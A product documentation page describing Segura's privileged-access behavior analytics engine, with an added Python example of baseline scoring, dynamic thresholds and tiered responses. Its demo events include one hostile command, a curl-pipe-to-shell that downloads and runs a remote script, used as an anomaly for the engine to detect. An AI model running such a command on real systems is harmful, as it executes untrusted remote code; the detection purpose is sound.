About Architecture and operation


Data flow and event capture

Segura's User Behavior engine is designed to continuously capture, analyze, and correlate privileged access events across multiple vectors of the infrastructure. The data flow consists of:

  • Monitored Sessions: Real-time activity capture in RDP, SSH, Web (HTML5), database, API, local application, and remote endpoint sessions.
  • Integration with Logs and Auditing: Consumes Segura's internal records (audit logs, session recordings, credential checkout logs) and can integrate external logs from SIEM, SOAR, EDR, Threat Intelligence, and ITSM for expanded context.
  • Contextual Metadata: Includes information about the device, location, network, time, access method, credential type, applied policy, geographic origin, and user history.
  • Triggered events: every user action (credential checkout, session start/end, command execution, secret retrieval) is enriched and recorded with its full context, forming a detailed, correlatable timeline.

Analytics engine and processing layers

The core of Segura's User Behavior analytics engine follows a multi-layered processing model:

  • Collection layer: aggregates data from live sessions, event logs, external integrations, and security signals, and is designed for high-volume ingestion.
  • Analysis and correlation: normalizes, enriches, and correlates events across multiple domains. Goes beyond isolated actions, analyzing sequences, frequency, deviations, and interactions.
  • Baseline modeling: creates dynamic behavioral profiles for each user, credential, and asset, using machine learning to define what is common considering times, commands, devices, typing patterns, accessed resources, session durations, etc.
  • Real-time evaluation and dynamic thresholds: each new event is compared with the baseline using adaptive thresholds tuned by ML models, so anomalies are still identified as legitimate patterns drift gradually over time.
  • Response orchestration and triggers: upon detecting a deviation or suspicious behavior (e.g., out-of-hours access, excessive credential viewing, use of a new device, an abnormal command), the system triggers adaptive responses such as alerts, step-up MFA, session suspension, or automatic hand-off to SOAR for containment.

Integration with logs, sessions, and external data

  • Sessions: all session events (RDP, SSH, web, API, database) are correlated with the user's historical behavior and active context.
  • Logs and auditing: every action, evaluation, and response is written to an immutable audit trail, forming a detailed record for compliance, forensic investigation, and regulatory reporting.
  • External signals: the Behavior Engine can consume risk indicators from external systems (SIEM, SOAR, EDR, Threat Intelligence), increasing detection accuracy and enabling automated responses driven by external events (such as immediate blocking when a confirmed IOC matches).

Decision and orchestration flow

Typical decision and orchestration flow:

  1. Action: user performs an activity (e.g., starts a session, queries a password, executes a command).
  2. Capture and enrichment: event is registered with full context (who, when, where, how, and why).
  3. Baseline evaluation: system compares current behavior with individual baseline and risk model.
  4. Thresholds and dynamic evaluation: if the behavior is within expectations, access proceeds normally. If it exceeds dynamic thresholds, triggers are activated.
  5. Automated response: depending on the level of risk and policy, the system can alert the team, require MFA, suspend the session, revoke access, or trigger automated playbooks via SOAR.
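The five steps above, and the baseline/threshold layers from the previous section, are easier to reason about with a concrete scoring loop in front of you. The following Python is an added illustration written for this page, not Segura's code or its scoring model: the per-signal weights, the "rare hour" rule, the "mean plus two standard deviations" checkout limit, the response tiers and the IOC list are all assumptions, and the training history and test events are constructed here.

```python
"""Toy behavioral baseline, adaptive threshold and tiered response.

Added example, not Segura code. Weights, tiers and limits are assumptions.
"""
from collections import Counter, defaultdict, deque
from dataclasses import dataclass, field
from datetime import datetime, timedelta
from statistics import mean, pstdev


@dataclass
class Event:
    user: str
    ts: datetime
    device: str
    src_ip: str
    action: str        # "session_start", "credential_checkout" or "command"
    detail: str = ""   # command line or credential name


@dataclass
class Baseline:
    """Per-user profile: hours, devices, commands and daily checkout volume."""
    hours: Counter = field(default_factory=Counter)
    devices: Counter = field(default_factory=Counter)
    commands: Counter = field(default_factory=Counter)
    daily_checkouts: dict = field(default_factory=lambda: defaultdict(int))
    total: int = 0

    def learn(self, ev: Event) -> None:
        self.total += 1
        self.hours[ev.ts.hour] += 1
        self.devices[ev.device] += 1
        if ev.action == "command":
            self.commands[ev.detail] += 1
        elif ev.action == "credential_checkout":
            self.daily_checkouts[ev.ts.date()] += 1

    def checkout_limit(self) -> float:
        """Assumed limit: mean + 2 sigma of historical checkouts per day."""
        counts = list(self.daily_checkouts.values())
        return mean(counts) + 2 * pstdev(counts) if counts else 0.0


class BehaviorEngine:
    FLOOR = 2.0        # minimum score before any response (assumption)
    RARE_HOUR = 0.05   # hour seen in <5% of history counts as out-of-hours

    def __init__(self, ioc_ips=frozenset()):
        self.baselines = defaultdict(Baseline)
        self.recent_scores = defaultdict(lambda: deque(maxlen=50))
        self.today_checkouts = defaultdict(int)   # (user, date) -> count
        self.ioc_ips = ioc_ips                    # external signal (constructed)

    def train(self, events):
        for ev in events:
            self.baselines[ev.user].learn(ev)

    def score(self, ev):
        """Step 3: compare the event with the user's baseline."""
        b, reasons, score = self.baselines[ev.user], [], 0.0
        if b.hours[ev.ts.hour] < self.RARE_HOUR * b.total:
            score += 3; reasons.append("out-of-hours")
        if ev.device not in b.devices:
            score += 3; reasons.append("new device")
        if ev.action == "command" and ev.detail not in b.commands:
            score += 3; reasons.append("abnormal command")
        if ev.action == "credential_checkout":
            key = (ev.user, ev.ts.date())
            self.today_checkouts[key] += 1
            if self.today_checkouts[key] > b.checkout_limit():
                score += 3; reasons.append("excessive credential viewing")
        return score, reasons

    def threshold(self, user):
        """Step 4: dynamic threshold from the user's recent accepted scores."""
        hist = list(self.recent_scores[user])
        if len(hist) < 2:
            return self.FLOOR
        return max(self.FLOOR, mean(hist) + 2 * pstdev(hist))

    def evaluate(self, ev):
        """Steps 2-5 for one event: enrich, score, compare, respond."""
        if ev.src_ip in self.ioc_ips:   # confirmed IOC short-circuits scoring
            return {"decision": "block", "score": None, "reasons": ["confirmed IOC"]}
        score, reasons = self.score(ev)
        excess = score - self.threshold(ev.user)
        decision = ("allow" if excess < 0 else "alert" if excess < 3
                    else "require_mfa" if excess < 6 else "suspend_session")
        if decision == "allow":
            # Only accepted events feed the baseline, so an intruder cannot
            # slowly normalise abnormal behaviour into the profile.
            self.baselines[ev.user].learn(ev)
            self.recent_scores[ev.user].append(score)
        return {"decision": decision, "score": score, "reasons": reasons}


def build_history(user="alice", days=20):
    """Constructed history: office hours, one laptop, routine commands."""
    day, events, done = datetime(2024, 3, 4), [], 0
    while done < days:
        if day.weekday() < 5:
            base = dict(user=user, device="LAPTOP-A1", src_ip="10.0.0.5")
            events.append(Event(ts=day.replace(hour=9), action="session_start", **base))
            for h, cmd in ((10, "ls -la"), (11, "systemctl status nginx"),
                           (15, "cat /var/log/syslog")):
                events.append(Event(ts=day.replace(hour=h), action="command", detail=cmd, **base))
            for k in range(1 + done % 3):   # 1, 2 or 3 checkouts per day
                events.append(Event(ts=day.replace(hour=14), action="credential_checkout",
                                    detail=f"db-cred-{k}", **base))
            done += 1
        day += timedelta(days=1)
    return events


def run_demo():
    """Constructed test events; returns the engine's decision for each."""
    eng = BehaviorEngine(ioc_ips=frozenset({"198.51.100.77"}))
    eng.train(build_history())
    d = datetime(2024, 4, 2)
    ok = dict(user="alice", device="LAPTOP-A1", src_ip="10.0.0.5")
    events = [Event(ts=d.replace(hour=10), action="command", detail="ls -la", **ok),
              Event("alice", d.replace(hour=2, minute=30), "UNKNOWN-PC", "10.0.0.5",
                    "command", "curl http://203.0.113.9/x.sh | sh")]
    events += [Event(ts=d.replace(hour=14), action="credential_checkout",
                     detail="db-cred-0", **ok) for _ in range(4)]
    events.append(Event("alice", d.replace(hour=10, minute=5), "LAPTOP-A1",
                        "198.51.100.77", "session_start"))
    return [eng.evaluate(ev) for ev in events]


if __name__ == "__main__":
    for r in run_demo():
        print(r["decision"], r["score"], r["reasons"])
```

The design choice worth copying is in `evaluate`: only events the engine accepts are fed back into the baseline and into the threshold history. If flagged events were also learned, an attacker operating a compromised account could raise the threshold gradually and make the "new device, off-hours, unusual command" pattern look normal within a few weeks.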

Security, compliance and value

  • Adaptive security: the engine adjusts in real time to changes in behavior, reducing the response time to insider threats or compromised accounts.
  • Automated execution: suspicious or anomalous actions trigger immediate policy enforcement, without the need for manual intervention.
  • Reporting and compliance: reports and dashboards offer complete visibility for risk management, auditing, and compliance with regulations.